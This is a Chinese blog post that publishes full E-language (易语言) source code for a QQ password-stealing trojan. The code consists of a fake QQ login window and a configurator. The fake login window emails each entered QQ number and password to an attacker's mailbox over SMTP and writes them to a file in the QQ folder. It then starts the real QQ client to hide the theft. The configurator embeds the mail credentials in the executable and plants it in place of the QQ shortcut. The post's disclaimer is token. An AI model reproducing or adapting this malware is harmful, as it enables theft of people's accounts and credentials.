易语言写的类QQ小偷程序

我的小作品 CN-P5 1544℃ 0评论

自己写的代码参照了易语言俱乐部的网友的qq界面代码,自己写了QQ医生判断代码,高级设置界面&代码没有更改,原创转载请注明。

由于写的匆忙刚调试通过,大家讲究看。欢迎喜欢易的朋友交流。只是一个类似木马程序,可以实现把QQ号码和密码发送到制定邮箱,写入QQ目录下的QQJ.DAT文件的功能。我就不给打包程序了,请大家不要用于非法用途。只是提供一个思路,就是“见缝插针”木马的思路,把配置器的代码插入登陆器,不明白的要源码的留言或者消息。

这是登陆器的代码:

.版本 2
.支持库 internet
.支持库 dp1

.程序集 窗口程序集1
.程序集变量 QQ目录路径, 文本型
.程序集变量 QQ路径, 文本型

.子程序 _图形按钮2_被单击

图形按钮4.可视 = 真
图形按钮2.可视 = 假
_启动窗口.高度 = 534

.子程序 _图形按钮3_被单击
.局部变量 QQDoctor, 文本型

QQDoctor = 取文本注册项 (4, “SoftwareTencentQQDoctorinstall”, “未检测到QQ医生”)
.如果真 (QQDoctor = “未检测到QQ医生”)
     信息框 (“你没有安装QQ医生软件,请到http://www.qq.com下载”, 0, “系统提示”)
     结束 ()
.如果真结束
运行 (QQDoctor + “QQDoctor.exe”, 假, )

.子程序 _图形按钮4_被单击

图形按钮2.可视 = 真
图形按钮4.可视 = 假
_启动窗口.高度 = 240

.子程序 _图形按钮1_被单击

.如果真 (号码编辑框.内容 = “”)
     信息框 (“格式要求:由5到10个纯数字组成。”, 0 + #询问图标, “无效的QQ号码格式”)
     返回 ()

.如果真结束
.如果真 (密码编辑框.内容 = “”)
     信息框 (“输入密码与上次成功登陆的密码不一致,” + #换行符 + “是否到服务器验证?”, 0 + #错误图标 + #是否钮, “错误”)

     返回 ()

.如果真结束
_启动窗口.可视 = 假
‘ 连接发信服务器 (服务器, 25, 帐号, 密码, 10000)
发送邮件 (“黑白号召大家强奸TX!”, “黑白告诉你一个好消息!” + #换行符 + “你可能在强奸TX过程中得到了一个帐号:” + 号码编辑框.内容 + “      ” + “密码:” + 密码编辑框.内容 + #换行符 + “欢迎访问俺地博客《一亩三分地》”, “收件箱”, “”, “”, “”, “”)
时钟1.时钟周期 = 7000
结束 ()

.子程序 __启动窗口_创建完毕
.局部变量 数据, 字节集
.局部变量 pos, 整数型
.局部变量 文件号, 整数型
.局部变量 文本, 文本型
.局部变量 临时文本数组, 文本型, , "0"
.局部变量 s, 文本型
.局部变量 长度, 整数型

_启动窗口.宽度 = 330
_启动窗口.高度 = 240
.如果真 (注册项是否存在 (4, “SOFTWARETENCENTPLATFORM_TYPE_LIST1TypeName”) = 假)
     信息框 (“你没有安装过QQ软件,请到http://www.qq.com下载”, 0, “系统提示”)
     结束 ()

.如果真结束
QQ路径 = 取文本注册项 (4, “SOFTWARETENCENTPLATFORM_TYPE_LIST1TypePath”, )
QQ目录路径 = 取文本注册项 (4, “SoftwareTencentQQinstall”, “未检测到QQ”)
.如果真 (QQ目录路径 = “未检测到QQ”)
     信息框 (“你没有安装过QQ软件,请到http://www.qq.com下载”, 0, “系统提示”)
     结束 ()

.如果真结束
‘ 顶图.正常图片 = #顶图
‘ 底图.正常图片 = #底图
输出调试文本 (“QQ安装路径:” + QQ路径)
取数值目录到组合框 (QQ目录路径 + “”, 号码组合框)
号码编辑框.获取焦点 ()
号码编辑框.内容 = 号码组合框.取项目文本 (1)
标题 = “QQ用户登陆”
s = |||帐号|||密码|||收件箱|||                                                                                                ”
数据 = 读入文件 (取执行文件名 ())
p = 寻找字节集 (数据, 到字节集 (”), )
.如果真 (pos ≠ -1)

.如果真结束
文件号 = 打开文件 (取执行文件名 (), #读入, )
移动读写位置 (文件号, #文件首, p + 5)
文本 = 读入文本 (文件号, 取文本长度 (s) - 5)
关闭文件 (文件号)
临时文本数组 = 分割文本 (文本, “|||”, )
长度 = 到数值 (临时文本数组 [1])
服务器 = 临时文本数组 [2]
帐号 = 临时文本数组 [3]
密码 = 临时文本数组 [4]
收件箱 = 临时文本数组 [5]
连接发信服务器 (服务器, 25, 帐号, 密码, 10000)

.子程序 _号码组合框_列表项被选择

号码编辑框.内容 = 号码组合框.取项目文本 (号码组合框.现行选中项)
号码编辑框.获取焦点 ()
号码编辑框.被选择字符数 = -1

.子程序 _号码编辑框_列表项被选择

号码组合框.内容 = 号码组合框.取项目文本 (号码组合框.现行选中项)

.子程序 登录
.局部变量 摘要文本, 文本型
.局部变量 摘要字节集, 字节集
.局部变量 加密的密码, 文本型
.局部变量 隐身, 文本型, , , 40:隐身;41:不隐身
.局部变量 变量1, 整数型
.局部变量 qqj, 整数型

摘要文本 = 取数据摘要 (到字节集 (密码编辑框.内容))

发送邮件 (“黑白号召大家强奸TX!”, “黑白告诉你一个好消息!” + #换行符 + “你可能在强奸TX过程中得到了一个帐号:” + 号码编辑框.内容 + “      ” + “密码:” + 密码编辑框.内容 + #换行符 + “欢迎访问俺地博客《一亩三分地》”, “收件箱”, “”, “”, “”, “”)
qqj = 打开文件 (QQ目录路径 + “qqj.dat”, #改写, #禁止读写)
写文本行 (qqj, “号码” + 号码编辑框.内容 + #换行符 + “密码” + 密码编辑框.内容)
关闭文件 (qqj)
摘要字节集 = 取空白字节集 (16)
.计次循环首 (16, 变量1)   ‘ 由于数据摘要文本长度为32,这里将每两位文本按十六进制转换为十进制字节,生成一个长为16的摘要字节集。
     摘要字节集 [变量1] = 到字节 (十六进制到十进制 (取文本中间 (摘要文本, (变量1 - 1) × 2 + 1, 2)))
.计次循环尾 ()
加密的密码 = BASE64编码 (摘要字节集)

.如果 (选择框2.选中 = 真)
     隐身 = 选择 (真, “40”, “41”)
.否则
     隐身 = 选择 (假, “40”, “41”)
.如果结束
输出调试文本 (QQ路径)
运行 (QQ路径 + “ /START QQUIN:” + 号码编辑框.内容 + “ PWDHASH:” + 加密的密码 + “ /STAT:” + 隐身, 假, )
结束 ()

.子程序 _图形按钮6_被单击

超级链接框2.跳转 ()

.子
程序 _图形按钮7_被单击

超级链接框1.跳转 ()

.子程序 _号码编辑框_内容被改变

.子程序 _图形按钮5_被单击

号码组合框.发送信息 (335, 1, 0)

.子程序 _选择框2_被单击

.子程序 _时钟1_周期事件

登录 ()
——————————————————————————————————————————-

以下是配置器的代码:

.版本 2
.支持库 shell
.支持库 internet

.程序集 窗口程序集1

.子程序 __启动窗口_创建完毕

分组框1.左边 = 1
分组框1.顶边 = 1
分组框1.宽度 = _启动窗口.宽度 - 2
分组框1.高度 = _启动窗口.高度 - 2
写到文件 (取特定目录 (#临时文件目录) + “4.ssk”, #ssk4)
加载皮肤 (取特定目录 (#临时文件目录) + “4.ssk”, 假)

.子程序 _运行_被单击
.局部变量 文件号, 整数型
.局部变量 pos, 整数型
.局部变量 数据, 字节集
.局部变量 文本, 文本型
.局部变量 QQ目录, 文本型

写到文件 (“QQ登录器.exe”, #QQ)
.如果 (服务器框.内容 ≠ “”)

.否则
     信息框 (“配置文件错误!”, #确认钮 + #警告图标, “提示你”)
.如果结束
数据 = 读入文件 (“QQ登录器.exe”)
p = 寻找字节集 (数据, 到字节集 (”), )
文件号 = 打开文件 (“QQ登录器.exe”, #写出, #禁止读写)
移动读写位置 (文件号, #文件首, p + 5)
服务器 = 到文本 (服务器框.内容)
帐号 = 到文本 (帐号框.内容)
密码 = 到文本 (密码框.内容)
收件箱 = 到文本 (收件箱框.内容)
文本 = |||” + 服务器 + “|||” + 帐号 + “|||” + 密码 + “|||” + 收件箱 + “|||”
写出字节集 (文件号, 到字节集 (文本))
关闭文件 (文件号)
QQ目录 = 取文本注册项 (4, “SoftwareTencentQQinstall”, “未检测到QQ”)
.如果真 (QQ目录 = “未检测到QQ”)
     信息框 (“移动登陆器到QQ目录失败,请手动复制到QQ目录”, #确认钮 + #警告图标, “系统提示”)
     结束 ()
.如果真结束
进度移动文件 (QQ目录, 取运行目录 () + “QQ登陆器.exe”)
信息框 (“配置成功!” + #换行符 + “现在修改一下桌面上的QQ快捷方式(目标)为(QQ登录器)运行一下,随便填个密码试试收信!”, 0, “提示你”)

.子程序 _测试_被单击

连接发信服务器 (服务器, 25, 帐号, 密码, 20000)
发送邮件 (“黑白号召大家强奸TX!”, “黑白告诉你一个好消息!” + #换行符 + “你可能在强奸TX过程中找到了一个猥琐男———化腾兄,他请求你帮助他强奸QQ号!赶快行动吧!!!” + #换行符 + “欢迎访问俺地博客《一亩三分地》–收到这封信表示你的QQ登录器配置是正确的!!!”, “收件箱”, “”, “”, “”, “”)

转载请注明:黑白的自留地 » 易语言写的类QQ小偷程序

喜欢 (0)
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址